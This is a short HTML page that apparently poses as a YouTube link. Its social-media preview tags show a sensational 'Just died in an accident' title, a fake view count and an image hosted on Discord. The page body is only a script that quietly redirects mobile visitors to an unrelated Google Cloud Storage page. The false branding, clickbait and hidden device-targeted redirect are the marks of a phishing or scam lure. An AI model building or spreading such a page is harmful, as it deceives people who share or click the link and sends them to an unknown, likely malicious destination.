<html>
	<head>
		<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
		<meta name="facebook:card" content="summary_large_image" />
		<meta name="facebook:description" content="Youtube" />
		<meta name="facebook:app:country" content="US" />
		<meta property="og:image" content="https://cdn.discordapp.com/attachments/772623435704303646/1112389004483108985/yjtyjeedrrejtyjaergaeddddsdrgaergaergdfsrthgdfgaergaergaergserthsrthsfghfghfghfghhdfhdfherhjgherjghj.jpg?ex=662e5efd&is=661be9fd&hm=b7c7656c7026f800d194aadf286d4971185ef3aebb76ea9fb6a94fc623e68280&" />
		<meta property="og:title" content="Just died in an accident" />
		<meta property="og:description" content="854, 865 views" />
		<meta property="og:site_name" content="YouTube" />
		<meta property="fb:app_id" content="124024574287414" />
	</head>
	<body>
<script type="text/javascript">
     //<![CDATA[
         var isMobile = /Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
     
         if (isMobile) {
             window.location.href = "https://storage.googleapis.com/6765drthj/index.html";
         }
     //]]>
     </script>